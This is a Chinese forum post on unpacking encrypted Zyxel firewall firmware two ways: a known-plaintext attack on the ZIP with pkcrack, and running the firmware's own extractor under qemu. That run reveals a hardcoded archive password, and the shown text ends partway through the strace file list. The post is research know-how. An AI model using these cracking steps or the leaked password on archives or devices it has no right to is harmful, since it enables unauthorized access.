|
|
发表于 2022-9-23 16:00:02
|
显示全部楼层
|阅读模式
IP:山东省 移动/数据上网公共出口
登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
花式解密Zyxel加密固件包
附件:链接: https://pan.baidu.com/s/1quusIdp38y7fQdF5zZhbiw 提取码: hh9p
前言在网上看到了几篇有意思的文章,感觉能和自己之前在打CTF比赛时的知识相结合,遂自己动手复现一下。 参考资料:
复现1、准备打开该URL:https://portal.myzyxel.com/my/firmwares,发现需要登录:
使用临时邮箱注册就可以解决问题,毕竟你也不想让自己常用的邮箱变为垃圾邮件回收站吧?注册后继续访问该网站,选择如下图所示的版本号:
点击后面的Download下载文件,下载后对zip压缩包解压unzip -d ./firmware firmware.zip,可以得到:
 现在我们的目标是解压出该设备的文件系统(file-system),所以当前的目标为470AALA0C0.bin,使用binwalk查看信息:
基本为1,这表明该固件处于加密或压缩状态;使用binwalk 470AALA0C0.bin查看其状态:
该bin文件实际上是处于加密状态的zip压缩包,可以使用file命令验证一下:
同样需要注意的是解压出来的不仅只有bin文件,还有一些其他文件,这些文件可能对我们之后的解密470AALA0C0.bin带来一些帮助:
分别计算这些文件的CRC32校验值:
将470AALA0C0.bin拖拽到Windows中,使用7-zip打开,逐级目录翻找,最终发现./db/etc/zyxel/ftp/conf目录下的system-default.conf与前面的470AALA0C0.conf校验值相同:
这说明这两个文件完全相同,所以我采用明文攻击的手段来解包该加密的bin文件
2、解包方式1 — 明文攻击虽说明文攻击时现在CTF中一种常见的杂项题目类型,但是在这里我还是要强调几个问题,这里就以上面加密的system-default.conf为例吧:
明文攻击成功需要同时满足三个条件,缺一不可: 解包后的文件为decrypted_file.zip:
当然你也可以在执行命令时不加-d参数:pkcrack -C ./470AALA0C0.bin -c db/etc/zyxel/ftp/conf/system-default.conf -P ./ZIPs/470AALA0C0_ZIP_9.zip -p 470AALA0C0.conf,这表示pkcrack在搜索完压缩包的三部分密钥key之后继续搜索密码password:
这里请注意,pkcrack的破解分为对压缩文档的破解(得到key)和对压缩文档密码的破解(得到password),直接破解压缩文档只需要计算出3个关键的key,计算这3个key的效率非常高。而计算压缩文档密码则需要在算出来3个key的基础上再进行穷举,虽然比一般的非明文破解的穷举效率要高,但是根据密码的长度,计算难度呈指数级增长。所以当密码非常长的情况下,破解难度相当大。其实无论什么情况下,直接破解文档都比破解密码更划算,因为破解密码最终也还是为了拿到文件。(https://blog.csdn.net/qq_33265520/article/details/110137117)<br />除了pkcrack还有一个和这个工具名字比较接近的工具bkcrack(https://github.com/kimci86/bkcrack),通过它可以使用密钥对压缩包解包: PS:该工具到现在还在持续更新:
bkcrack-github页面
pkcrack-github页面 - 但是吧,使用bkcrack会报错,不知道是不是我不会用:bkcrack -C ./470AALA0C0.bin -c db/etc/zyxel/ftp/conf/system-default.conf -k cb49ab19 32740ab6 7b0c34a2 -d system-default.conf
Zip error: could not find end of central directory signature… 可能bkcrack不支持解压这种的zip格式文件吧… 无语…算了,接着使用pkcrack的zipdecrypt吧:
执行:zipdecrypt cb49ab19 32740ab6 7b0c34a2 470AALA0C0.bin tmp.zip 以得到解密之后的压缩包:
  另外,7-zip在对文件进行压缩时,可以对如下选项进行设置以影响最后的压缩率:
 对tmp.zip的compress.img进行binwalk解压即可得到该设备的文件系统:
 3、解包方式2 — 固件自带程序解密除了明文攻击之外还有一种方式可以解包固件,那就是使用固件自带的程序解密。因为包含有文件系统的镜像compress.img存在于加密的470AALA0C0.bin中,所以一定有一个解密程序在其它位置,我们很容易将目标锁定到470AALA0C0.ri:
使用binwalk简单的查看一下:
有uImage header,binwalk -Me解压:
在启动发现有fsextract字样,猜测有可能是固件的文件系统的解密程序(file system extract)。对该文件信息收集:
静态链接的大端序ELF可执行程序,可以使用qemu模拟。请注意,虽然file该可执行文件显示的是ELF 32-bit,但是实际上其是64bit程序:
运行该类程序需要使用qemu的mipsn32,如下图所示:
如果使用qemu-mips-static运行则会出现段错误,提示Illegal instruction(非法指令):
qemu-mipsn32-static运行:
好家伙2010年的程序,这解密程序够老了…想要了解该可执行文件的使用方法,还是得回到上级目录的zyinit,看名字好像是Zyxel设备的初始化程序,并且在该程序中有zld_fsextract字样:
将zyini拖入到IDA中查看:
对/zyinit/zld_fsextract程序交叉引用过去:
 
结合之前了解到的内容,所以解压命令的格式应该为./zld_fsextract 【固件名称】 ./unzip -s extract -e,即qemu-mipsn32-static -strace ./zld_fsextract 470AALA0C0.bin ./unzip -s extract -e:
还是段错误,总感觉-e参数后面还缺了一个什么东西,并且根据si_addr=NULL可以知道是由于空指针造成的段错误,还是老老实实的逆一下zld_fsextract程序吧,交叉引用来到: 对sub_10001198交叉引用,来到: 大致看一下参数的功能吧: 上面有一个list参数,大致会列出来一些文件的信息: - cyberangel@cyberangel:~/Desktop/Zyxel/firmware/_470AALA0C0.ri.extracted/_240.extracted/cpio-root/zyinit$ qemu-mipsn32-static ./zld_fsextract 470AALA0C0.bin ./unzip -s list
- name :kernel
- scope :-f kernelshare40.bin -f kernelchecksum -D /
- nc_scope :-f kernelshare40.bin
- version :3.10.87
- build_date :2021-10-27 16:34:05
- checksum :db77009f14d2f36f0fbb73bf6655ba75
- core_checksum :582806436b89d0eefd3b20e9348482a1
- name :code
- scope :-f bmshare40.bin -f bmchecksum -f kernelshare40.bin -f kernelchecksum -d wtp_image -d db -i -D /rw
- scope :-d db/etc/zyxel/ftp/conf -D /
- nc_scope :-f fwversion -f filechecksum -f wtpinfo
- version :4.70(AALA.0)
- build_date :2021-10-27 17:02:25
- checksum :c8ad7e3bcf3f7a710d063f2154d99307
- core_checksum :35b92a6d1192fdb23c78a7324feda44c
- name :WTP_wtp_image/nwa5120
- scope :-f wtp_image/nwa5120 -D /db
- nc_scope :
- version :5.10(###.10)
- build_date :2021-01-21 10:04:56
- checksum :
- core_checksum :
- name :WTP_wtp_image/wax650
- scope :-f wtp_image/wax650 -D /db
- nc_scope :
- version :6.25(###.1)
- build_date :2021-10-04 03:22:31
- checksum :
- core_checksum :
- name :WTP_wtp_image/wac6500
- scope :-f wtp_image/wac6500 -D /db
- nc_scope :
- version :6.25(###.0)
- build_date :2021-09-17 03:42:10
- checksum :
- core_checksum :
- name :WTP_wtp_image/nwa5301
- scope :-f wtp_image/nwa5301 -D /db
- nc_scope :
- version :5.10(###.10)
- build_date :2021-01-21 10:27:30
- checksum :
- core_checksum :
- name :WTP_wtp_image/nwa5123-ac
- scope :-f wtp_image/nwa5123-ac -D /db
- nc_scope :
- version :6.10(###.10)
- build_date :2021-01-21 15:20:56
- checksum :c1695615ba4a9f462cc5af123a60d82c
- core_checksum :c1695615ba4a9f462cc5af123a60d82c
- name :WTP_wtp_image/nwa5kcn50
- scope :-f wtp_image/nwa5kcn50 -D /db
- nc_scope :
- version :5.10(###.3)
- build_date :2018-01-23 11:28:31
- checksum :
- core_checksum :
- name :WTP_wtp_image/wac500h
- scope :-f wtp_image/wac500h -D /db
- nc_scope :
- version :6.25(###.0)
- build_date :2021-09-17 08:01:37
- checksum :
- core_checksum :
- name :WTP_wtp_image/wac500
- scope :-f wtp_image/wac500 -D /db
- nc_scope :
- version :6.25(###.0)
- build_date :2021-09-17 07:16:39
- checksum :
- core_checksum :
- name :WTP_wtp_image/wac6100
- scope :-f wtp_image/wac6100 -D /db
- nc_scope :
- version :6.25(###.0)
- build_date :2021-09-17 04:16:53
- checksum :
- core_checksum :
- name :WTP_wtp_image/wax610
- scope :-f wtp_image/wax610 -D /db
- nc_scope :
- version :6.25(###.1)
- build_date :2021-10-04 01:41:11
- checksum :
- core_checksum :
- name :WTP_wtp_image/wac6300
- scope :-f wtp_image/wac6300 -D /db
- nc_scope :
- version :6.25(###.0)
- build_date :2021-09-17 03:13:45
- checksum :
- core_checksum :
- name :WTP_wtp_image/wac5300v2
- scope :-f wtp_image/wac5300v2 -D /db
- nc_scope :
- version :6.25(###.0)
- build_date :2021-09-17 08:28:21
- checksum :
- core_checksum :
- name :WTP_wtp_image/wax510
- scope :-f wtp_image/wax510 -D /db
- nc_scope :
- version :6.25(###.1)
- build_date :2021-10-04 04:12:21
- checksum :
- core_checksum :
- name :WTP_wtp_image/wac5300
- scope :-f wtp_image/wac5300 -D /db
- nc_scope :
- version :6.10(###.10)
- build_date :2021-01-21 12:16:54
- checksum :
- core_checksum :
- name :WTP_wtp_image/nwa5123-ac-hd
- scope :-f wtp_image/nwa5123-ac-hd -D /db
- nc_scope :
- version :6.25(###.0)
- build_date :2021-09-17 04:43:21
- checksum :fd5bdf5ed8a5277ee8ad3988361cd973
- core_checksum :fd5bdf5ed8a5277ee8ad3988361cd973
- cyberangel@cyberangel:~/Desktop/Zyxel/firmware/_470AALA0C0.ri.extracted/_240.extracted/cpio-root/zyinit$
虽然看起来没什么用,但从经验出发,list应该是列出一些文件信息,而使用extract参数应该可以解压缩这些文件,毕竟这两个参数同处于-s下面,我们来试试: - qemu-mipsn32-static -strace ./zld_fsextract 470AALA0C0.bin ./unzip -s extract -e code
- cyberangel@cyberangel:~/Desktop/Zyxel/firmware/_470AALA0C0.ri.extracted/_240.extracted/cpio-root/zyinit$ qemu-mipsn32-static -strace ./zld_fsextract 470AALA0C0.bin ./unzip -s extract -e code
- 12764 ioctl(0,21517,1082129888,1082130724,8,0) = 0
- 12764 ioctl(1,21517,1082129888,1082130017,8,1) = 0
- 12764 rt_sigaction(SIGALRM,0x407ffb50,0x407ffb70) = 0
- 12764 brk(NULL) = 0x10129000
- 12764 brk(0x1012a000) = 0x1012a000
- 12764 brk(0x1012d000) = 0x1012d000
- 12764 brk(0x10131000) = 0x10131000
- 12764 brk(0x10135000) = 0x10135000
- 12764 alarm(1,268500992,269568872,115,1082130838,1936946035) = 0
- 12764 open("470AALA0C0.bin",O_RDONLY) = 3
- 12764 ioctl(3,21517,1082129312,0,1082129948,0) = -1 errno=25 (Inappropriate ioctl for device)
- 12764 brk(0x10136000) = 0x10136000
- 12764 lseek(3,-12,2,269700192,1082129948,1) = 136920272
- 12764 Linux(3,1082129568,4,269700128,1082129948,1) = 4
- 12764 Linux(3,1082129572,4,269700128,1082129948,1) = 4
- 12764 brk(0x10155000) = 0x10155000
- 12764 lseek(3,-126604,2,269704296,1082129948,1) = 136793680
- 12764 Linux(3,269704304,126592,269700128,1082129948,1) = 126592
- 12764 brk(0x10162000) = 0x10162000
- 12764 brk(0x10163000) = 0x10163000
- 12764 brk(0x10164000) = 0x10164000
- 12764 brk(0x10165000) = 0x10165000
- 12764 brk(0x10166000) = 0x10166000
- 12764 brk(0x10167000) = 0x10167000
- 12764 brk(0x10169000) = 0x10169000
- 12764 close(3) = 0
- 12764 fork() = 12766
- = 0
- 12764 wait4(-1,1082108672,0,0,1082129416,2)12766 execve("./unzip",{"./unzip","-o","-q","-P","vj/LOia3/vyoiX2No0MPojOrg0Pvf3OboPyC7YI9TGzCp1be3z3tiUkPWAKBFko","470AALA0C0.bin","-d","/rw","compress.img","etc_writable/","etc_writable/ModemManager/","etc_writable/ModemManager/libmm-plugin-altair-lte.so","etc_writable/ModemManager/libmm-plugin-anydata.so","etc_writable/ModemManager/libmm-plugin-cinterion.so","etc_writable/ModemManager/libmm-plugin-generic.so","etc_writable/ModemManager/libmm-plugin-gobi.so","etc_writable/ModemManager/libmm-plugin-hso.so","etc_writable/ModemManager/libmm-plugin-huawei.so","etc_writable/ModemManager/libmm-plugin-iridium.so","etc_writable/ModemManager/libmm-plugin-linktop.so","etc_writable/ModemManager/libmm-plugin-longcheer.so","etc_writable/ModemManager/libmm-plugin-mbm.so","etc_writable/ModemManager/libmm-plugin-motorola.so","etc_writable/ModemManager/libmm-plugin-mtk.so","etc_writable/ModemManager/libmm-plugin-nokia-icera.so","etc_writable/ModemManager/libmm-plugin-nokia.so","etc_writable/ModemManager/libmm-plugin-novatel-lte.so","etc_writable/ModemManager/libmm-plugin-novatel.so","etc_writable/ModemManager/libmm-plugin-option.so","etc_writable/ModemManager/libmm-plugin-pantech.so","etc_writable/ModemManager/libmm-plugin-samsung.so","etc_writable/ModemManager/libmm-plugin-sierra.so","etc_writable/ModemManager/libmm-plugin-simtech.so","etc_writable/ModemManager/libmm-plugin-telit.so","etc_writable/ModemManager/libmm-plugin-via.so","etc_writable/ModemManager/libmm-plugin-wavecom.so","etc_writable/ModemManager/libmm-plugin-x22x.so","etc_writable/ModemManager/libmm-plugin-zte.so","etc_writable/budget/","etc_writable/budget/budget.conf","etc_writable/cloud_checksum","etc_writable/dhcp6c-script","etc_writable/firmware-upgraded","etc_writable/tr069ta.conf","etc_writable/usb_modeswitch/","etc_writable/usb_modeswitch/03f0:002a","etc_writable/usb_modeswitch/0408:1000","etc_writable/usb_modeswitch/0408:ea17","etc_writable/usb_modeswitch/0408:ea25","etc_writable/usb_modeswitch/0408:ea43","etc_writable/usb_modeswitch/0408:f000","etc_writable/usb_modeswitch/0408:f001","etc_writable/usb_modeswitch/0421:060c","etc_writable/usb_modeswitch/0421:0610","etc_writable/usb_modeswitch/0421:0618","etc_writable/usb_modeswitch/0421:061d","etc_writable/usb_modeswitch/0421:0622","etc_writable/usb_modeswitch/0421:0627","etc_writable/usb_modeswitch/0421:062c","etc_writable/usb_modeswitch/0421:0632","etc_writable/usb_modeswitch/0421:0637","etc_writable/usb_modeswitch/0471:1210:uMa=Philips","etc_writable/usb_modeswitch/0471:1210:uMa=Wisue","etc_writable/usb_modeswitch/0471:1237","etc_writable/usb_modeswitch/0482:024d","etc_writable/usb_modeswitch/04bb:bccd","etc_writable/usb_modeswitch/04cc:2251","etc_writable/usb_modeswitch/04cc:225c","etc_writable/usb_modeswitch/04cc:226e","etc_writable/usb_modeswitch/04cc:226f","etc_writable/usb_modeswitch/04e8:680c","etc_writable/usb_modeswitch/04e8:689a","etc_writable/usb_modeswitch/04e8:f000:sMo=U209","etc_writable/usb_modeswitch/04fc:2140","etc_writable/usb_modeswitch/057c:62ff","etc_writable/usb_modeswitch/057c:84ff","etc_writable/usb_modeswitch/0586:0002","etc_writable/usb_modeswitch/0586:3441","etc_writable/usb_modeswitch/05c6:0010","etc_writable/usb_modeswitch/05c6:1000:sVe=GT","etc_writable/usb_modeswitch/05c6:1000:sVe=Option","etc_writable/usb_modeswitch/05c6:1000:uMa=AnyDATA","etc_writable/usb_modeswitch/05c6:1000:uMa=CELOT","etc_writable/usb_modeswitch/05c6:1000:uMa=DGT","etc_writable/usb_modeswitch/05c6:1000:uMa=Option","etc_writable/usb_modeswitch/05c6:1000:uMa=SAMSUNG","etc_writable/usb_modeswitch/05c6:1000:uMa=SSE","etc_writable/usb_modeswitch/05c6:1000:uMa=StrongRising","etc_writable/usb_modeswitch/05c6:1000:uMa=Vertex","etc_writable/usb_modeswitch/05c6:2000","etc_writable/usb_modeswitch/05c6:2001","etc_writable/usb_modeswitch/05c6:6503","etc_writable/usb_modeswitch/05c6:9024","etc_writable/usb_modeswitch/05c6:f000","etc_writable/usb_modeswitch/05c7:1000","etc_writable/usb_modeswitch/0685:2000","etc_writable/usb_modeswitch/072f:100d","etc_writable/usb_modeswitch/07d1:a800","etc_writable/usb_modeswitch/07d1:a804","etc_writable/usb_modeswitch/0922:1001","etc_writable/usb_modeswitch/0922:1003","etc_writable/usb_modeswitch/0930:0d46","etc_writable/usb_modeswitch/0ace:2011","etc_writable/usb_modeswitch/0ace:20ff","etc_writable/usb_modeswitch/0af0:4007","etc_writable/usb_modeswitch/0af0:6711","etc_writable/usb_modeswitch/0af0:6731","etc_writable/usb_modeswitch/0af0:6751","etc_writable/usb_modeswitch/0af0:6771","etc_writable/usb_modeswitch/0af0:6791","etc_writable/usb_modeswitch/0af0:6811","etc_writable/usb_modeswitch/0af0:6911","etc_writable/usb_modeswitch/0af0:6951","etc_writable/usb_modeswitch/0af0:6971","etc_writable/usb_modeswitch/0af0:7011","etc_writable/usb_modeswitch/0af0:7031","etc_writable/usb_modeswitch/0af0:7051","etc_writable/usb_modeswitch/0af0:7071","etc_writable/usb_modeswitch/0af0:7111","etc_writable/usb_modeswitch/0af0:7211","etc_writable/usb_modeswitch/0af0:7251","etc_writable/usb_modeswitch/0af0:7271","etc_writable/usb_modeswitch/0af0:7301","etc_writable/usb_modeswitch/0af0:7311","etc_writable/usb_modeswitch/0af0:7361","etc_writable/usb_modeswitch/0af0:7381","etc_writable/usb_modeswitch/0af0:7401","etc_writable/usb_modeswitch/0af0:7501","etc_writable/usb_modeswitch/0af0:7601","etc_writable/usb_modeswitch/0af0:7701","etc_writable/usb_modeswitch/0af0:7706","etc_writable/usb_modeswitch/0af0:7801","etc_writable/usb_modeswitch/0af0:7901","etc_writable/usb_modeswitch/0af0:7a01","etc_writable/usb_modeswitch/0af0:7a05","etc_writable/usb_modeswitch/0af0:8006","etc_writable/usb_modeswitch/0af0:8200","etc_writable/usb_modeswitch/0af0:8201","etc_writable/usb_modeswitch/0af0:8300","etc_writable/usb_modeswitch/0af0:8302","etc_writable/usb_modeswitch/0af0:8304","etc_writable/usb_modeswitch/0af0:8400","etc_writable/usb_modeswitch/0af0:8600","etc_writable/usb_modeswitch/0af0:8700","etc_writable/usb_modeswitch/0af0:8800","etc_writable/usb_modeswitch/0af0:8900","etc_writable/usb_modeswitch/0af0:9000","etc_writable/usb_modeswitch/0af0:9200","etc_writable/usb_modeswitch/0af0:c031","etc_writable/usb_modeswitch/0af0:c100","etc_writable/usb_modeswitch/0af0:d001","etc_writable/usb_modeswitch/0af0:d013","etc_writable/usb_modeswitch/0af0:d031","etc_writable/usb_modeswitch/0af0:d033","etc_writable/usb_modeswitch/0af0:d035","etc_writable/usb_modeswitch/0af0:d055","etc_writable/usb_modeswitch/0af0:d057","etc_writable/usb_modeswitch/0af0:d058","etc_writable/usb_modeswitch/0af0:d155","etc_writable/usb_modeswitch/0af0:d157","etc_writable/usb_modeswitch/0af0:d255","etc_writable/usb_modeswitch/0af0:d257","etc_writable/usb_modeswitch/0af0:d357","etc_writable/usb_modeswitch/0b3c:c700","etc_writable/usb_modeswitch/0b3c:f000","etc_writable/usb_modeswitch/0b3c:f00c","etc_writable/usb_modeswitch/0b3c:f017","etc_writable/usb_modeswitch/0bdb:190d","etc_writable/usb_modeswitch/0bdb:1910","etc_writable/usb_modeswitch/0cf3:20ff","etc_writable/usb_modeswitch/0d46:45a1","etc_writable/usb_modeswitch/0d46:45a5","etc_writable/usb_modeswitch/0df7:0800","etc_writable/usb_modeswitch/0e8d:0002:uPr=MT","etc_writable/usb_modeswitch/0e8d:0002:uPr=Product","etc_writable/usb_modeswitch/0e8d:7109","etc_writable/usb_modeswitch/0fca:8020","etc_writable/usb_modeswitch/0fce:d0cf","etc_writable/usb_modeswitch/0fce:d0df","etc_writable/usb_modeswitch/0fce:d0e1","etc_writable/usb_modeswitch/0fce:d103","etc_writable/usb_modeswitch/0fd1:1000","etc_writable/usb_modeswitch/1004:1000","etc_writable/usb_modeswitch/1004:607f","etc_writable/usb_modeswitch/1004:613a","etc_writable/usb_modeswitch/1004:613f","etc_writable/usb_modeswitch/1004:614e","etc_writable/usb_modeswitch/1004:6156","etc_writable/usb_modeswitch/1004:6190","etc_writable/usb_modeswitch/1004:61aa","etc_writable/usb_modeswitch/1004:61dd","etc_writable/usb_modeswitch/1004:61e7","etc_writable/usb_modeswitch/1004:61eb","etc_writable/usb_modeswitch/1004:6327","etc_writable/usb_modeswitch/1033:0035","etc_writable/usb_modeswitch/106c:3b03","etc_writable/usb_modeswitch/106c:3b05","etc_writable/usb_modeswitch/106c:3b06","etc_writable/usb_modeswitch/106c:3b11","etc_writable/usb_modeswitch/106c:3b14","etc_writable/usb_modeswitch/1076:7f40","etc_writable/usb_modeswitch/109b:f009","etc_writable/usb_modeswitch/10a9:606f","etc_writable/usb_modeswitch/10a9:6080","etc_writable/usb_modeswitch/1199:0fff","etc_writable/usb_modeswitch/1266:1000","etc_writable/usb_modeswitch/12d1:#android","etc_writable/usb_modeswitch/12d1:#linux","etc_writable/usb_modeswitch/12d1:1001","etc_writable/usb_modeswitch/12d1:1003","etc_writable/usb_modeswitch/12d1:1009","etc_writable/usb_modeswitch/12d1:1010","etc_writable/usb_modeswitch/12d1:101e","etc_writable/usb_modeswitch/12d1:1030","etc_writable/usb_modeswitch/12d1:1031","etc_writable/usb_modeswitch/12d1:1413","etc_writable/usb_modeswitch/12d1:1414","etc_writable/usb_modeswitch/12d1:1446","etc_writable/usb_modeswitch/12d1:1449","etc_writable/usb_modeswitch/12d1:14ad","etc_writable/usb_modeswitch/12d1:14b5","etc_writable/usb_modeswitch/12d1:14b7","etc_writable/usb_modeswitch/12d1:14ba","etc_writable/usb_modeswitch/12d1:14c1","etc_writable/usb_modeswitch/12d1:14c3","etc_writable/usb_modeswitch/12d1:14c4","etc_writable/usb_modeswitch/12d1:14c5","etc_writable/usb_modeswitch/12d1:14d1","etc_writable/usb_modeswitch/12d1:14fe","etc_writable/usb_modeswitch/12d1:1505","etc_writable/usb_modeswitch/12d1:151a","etc_writable/usb_modeswitch/12d1:1520","etc_writable/usb_modeswitch/12d1:1521","etc_writable/usb_modeswitch/12d1:1523","etc_writable/usb_modeswitch/12d1:1526","etc_writable/usb_modeswitch/12d1:1553","etc_writable/usb_modeswitch/12d1:1557","etc_writable/usb_modeswitch/12d1:155a","etc_writable/usb_modeswitch/12d1:155b","etc_writable/usb_modeswitch/12d1:156a","etc_writable/usb_modeswitch/12d1:157c","etc_writable/usb_modeswitch/12d1:157d","etc_writable/usb_modeswitch/12d1:1582","etc_writable/usb_modeswitch/12d1:1583","etc_writable/usb_modeswitch/12d1:15ca","etc_writable/usb_modeswitch/12d1:15cd","etc_writable/usb_modeswitch/12d1:15cf","etc_writable/usb_modeswitch/12d1:15e7","etc_writable/usb_modeswitch/12d1:1805","etc_writable/usb_modeswitch/12d1:1c0b","etc_writable/usb_modeswitch/12d1:1c1b","etc_writable/usb_modeswitch/12d1:1c24","etc_writable/usb_modeswitch/12d1:1d50","etc_writable/usb_modeswitch/12d1:1da1","etc_writable/usb_modeswitch/12d1:1f01","etc_writable/usb_modeswitch/12d1:1f02","etc_writable/usb_modeswitch/12d1:1f03","etc_writable/usb_modeswitch/12d1:1f07","etc_writable/usb_modeswitch/12d1:1f09","etc_writable/usb_modeswitch/12d1:1f11","etc_writable/usb_modeswitch/12d1:1f15","etc_writable/usb_modeswitch/12d1:1f16","etc_writable/usb_modeswitch/12d1:1f17","etc_writable/usb_modeswitch/12d1:1f18","etc_writable/usb_modeswitch/12d1:1f19","etc_writable/usb_modeswitch/12d1:1f1b","etc_writable/usb_modeswitch/12d1:1f1c","etc_writable/usb_modeswitch/12d1:1f1d","etc_writable/usb_modeswitch/12d1:1f1e","etc_writable/usb_modeswitch/12d1:380b","etc_writable/usb_modeswitch/1307:1169","etc_writable/usb_modeswitch/1410:5010","etc_writable/usb_modeswitch/1410:5020","etc_writable/usb_modeswitch/1410:5023","etc_writable/usb_modeswitch/1410:5030","etc_writable/usb_modeswitch/1410:5031","etc_writable/usb_modeswitch/1410:5041","etc_writable/usb_modeswitch/1410:5055","etc_writable/usb_modeswitch/1410:5059","etc_writable/usb_modeswitch/1410:7001","etc_writable/usb_modeswitch/148e:a000","etc_writable/usb_modeswitch/148f:2578","etc_writable/usb_modeswitch/15eb:7153","etc_writable/usb_modeswitch/1614:0800","etc_writable/usb_modeswitch/1614:0802","etc_writable/usb_modeswitch/16d8:6281","etc_writable/usb_modeswitch/16d8:6803","etc_writable/usb_modeswitch/16d8:6804","etc_writable/usb_modeswitch/16d8:700a","etc_writable/usb_modeswitch/16d8:700b","etc_writable/usb_modeswitch/16d8:f000","etc_writable/usb_modeswitch/1726:f00e","etc_writable/usb_modeswitch/1782:0003","etc_writable/usb_modeswitch/198a:0003","etc_writable/usb_modeswitch/198f:bccd","etc_writable/usb_modeswitch/19d2:#linux","etc_writable/usb_modeswitch/19d2:0003","etc_writable/usb_modeswitch/19d2:0026","etc_writable/usb_modeswitch/19d2:0040","etc_writable/usb_modeswitch/19d2:0053","etc_writable/usb_modeswitch/19d2:0083:uPr=WCDMA","etc_writable/usb_modeswitch/19d2:0101","etc_writable/usb_modeswitch/19d2:0103","etc_writable/usb_modeswitch/19d2:0110","etc_writable/usb_modeswitch/19d2:0115","etc_writable/usb_modeswitch/19d2:0120","etc_writable/usb_modeswitch/19d2:0146","etc_writable/usb_modeswitch/19d2:0149","etc_writable/usb_modeswitch/19d2:0150","etc_writable/usb_modeswitch/19d2:0154","etc_writable/usb_modeswitch/19d2:0166","etc_writable/usb_modeswitch/19d2:0169","etc_writable/usb_modeswitch/19d2:0266","etc_writable/usb_modeswitch/19d2:0304","etc_writable/usb_modeswitch/19d2:0318","etc_writable/usb_modeswitch/19d2:0325","etc_writable/usb_modeswitch/19d2:0388","etc_writable/usb_modeswitch/19d2:0413","etc_writable/usb_modeswitch/19d2:1001","etc_writable/usb_modeswitch/19d2:1007","etc_writable/usb_modeswitch/19d2:1009","etc_writable/usb_modeswitch/19d2:1013","etc_writable/usb_modeswitch/19d2:1017","etc_writable/usb_modeswitch/19d2:1030","etc_writable/usb_modeswitch/19d2:1038","etc_writable/usb_modeswitch/19d2:1171","etc_writable/usb_modeswitch/19d2:1175","etc_writable/usb_modeswitch/19d2:1179","etc_writable/usb_modeswitch/19d2:1201","etc_writable/usb_modeswitch/19d2:1207","etc_writable/usb_modeswitch/19d2:1210","etc_writable/usb_modeswitch/19d2:1216","etc_writable/usb_modeswitch/19d2:1219","etc_writable/usb_modeswitch/19d2:1224","etc_writable/usb_modeswitch/19d2:1225","etc_writable/usb_modeswitch/19d2:1227","etc_writable/usb_modeswitch/19d2:1232","etc_writable/usb_modeswitch/19d2:1233","etc_writable/usb_modeswitch/19d2:1237","etc_writable/usb_modeswitch/19d2:1238","etc_writable/usb_modeswitch/19d2:1420","etc_writable/usb_modeswitch/19d2:1511","etc_writable/usb_modeswitch/19d2:1514","etc_writable/usb_modeswitch/19d2:1517","etc_writable/usb_modeswitch/19d2:1520","etc_writable/usb_modeswitch/19d2:1523","etc_writable/usb_modeswitch/19d2:1528","etc_writable/usb_modeswitch/19d2:1536","etc_writable/usb_modeswitch/19d2:1542","etc_writable/usb_modeswitch/19d2:1588","etc_writable/usb_modeswitch/19d2:2000","etc_writable/usb_modeswitch/19d2:2004","etc_writable/usb_modeswitch/19d2:bccd","etc_writable/usb_modeswitch/19d2:ffde","etc_writable/usb_modeswitch/19d2:ffe6","etc_writable/usb_modeswitch/19d2:fff5","etc_writable/usb_modeswitch/19d2:fff6","etc_writable/usb_modeswitch/1a8d:1000","etc_writable/usb_modeswitch/1a8d:2000","etc_writable/usb_modeswitch/1ab7:5700","etc_writable/usb_modeswitch/1b7d:0700","etc_writable/usb_modeswitch/1bbb:000f","etc_writable/usb_modeswitch/1bbb:00ca","etc_writable/usb_modeswitch/1bbb:011f","etc_writable/usb_modeswitch/1bbb:022c","etc_writable/usb_modeswitch/1bbb:f000","etc_writable/usb_modeswitch/1bbb:f017","etc_writable/usb_modeswitch/1bbb:f052","etc_writable/usb_modeswitch/1c9e:1001","etc_writable/usb_modeswitch/1c9e:6000","etc_writable/usb_modeswitch/1c9e:6061:uPr=Storage","etc_writable/usb_modeswitch/1c9e:9101","etc_writable/usb_modeswitch/1c9e:9200","etc_writable/usb_modeswitch/1c9e:9401","etc_writable/usb_modeswitch/1c9e:9800","etc_writable/usb_modeswitch/1c9e:98ff","etc_writable/usb_modeswitch/1c9e:9d00","etc_writable/usb_modeswitch/1c9e:9e00","etc_writable/usb_modeswitch/1c9e:9e08","etc_writable/usb_modeswitch/1c9e:f000","etc_writable/usb_modeswitch/1c9e:f000:uMa=USB_Modem","etc_writable/usb_modeswitch/1d09:1000","etc_writable/usb_modeswitch/1d09:1021","etc_writable/usb_modeswitch/1d09:1025","etc_writable/usb_modeswitch/1da5:f000","etc_writable/usb_modeswitch/1dbc:0669","etc_writable/usb_modeswitch/1dd6:1000","etc_writable/usb_modeswitch/1de1:1101","etc_writable/usb_modeswitch/1e0e:f000","etc_writable/usb_modeswitch/1e89:f000","etc_writable/usb_modeswitch/1edf:6003","etc_writable/usb_modeswitch/1ee8:0003","etc_writable/usb_modeswitch/1ee8:0009","etc_writable/usb_modeswitch/1ee8:0013","etc_writable/usb_modeswitch/1ee8:0018","etc_writable/usb_modeswitch/1ee8:0040","etc_writable/usb_modeswitch/1ee8:0045","etc_writable/usb_modeswitch/1ee8:004a","etc_writable/usb_modeswitch/1ee8:004f","etc_writable/usb_modeswitch/1ee8:0054","etc_writable/usb_modeswitch/1ee8:0060","etc_writable/usb_modeswitch/1ee8:0063","etc_writable/usb_modeswitch/1ee8:0068","etc_writable/usb_modeswitch/1f28:0021","etc_writable/usb_modeswitch/1fac:0032","etc_writable/usb_modeswitch/1fac:0130","etc_writable/usb_modeswitch/1fac:0150","etc_writable/usb_modeswitch/1fac:0151","etc_writable/usb_modeswitch/2001:00a6","etc_writable/usb_modeswitch/2001:98ff","etc_writable/usb_modeswitch/2001:a401","etc_writable/usb_modeswitch/2001:a403","etc_writable/usb_modeswitch/2001:a405","etc_writable/usb_modeswitch/2001:a706","etc_writable/usb_modeswitch/2001:a707","etc_writable/usb_modeswitch/2001:a708","etc_writable/usb_modeswitch/2001:a805","etc_writable/usb_modeswitch/2001:a80b","etc_writable/usb_modeswitch/2001:ab00","etc_writable/usb_modeswitch/201e:1023","etc_writable/usb_modeswitch/201e:2009","etc_writable/usb_modeswitch/2020:0002","etc_writable/usb_modeswitch/2020:f00e","etc_writable/usb_modeswitch/2020:f00f","etc_writable/usb_modeswitch/2077:1000","etc_writable/usb_modeswitch/2077:f000","etc_writable/usb_modeswitch/20a6:f00e","etc_writable/usb_modeswitch/20b9:1682","etc_writable/usb_modeswit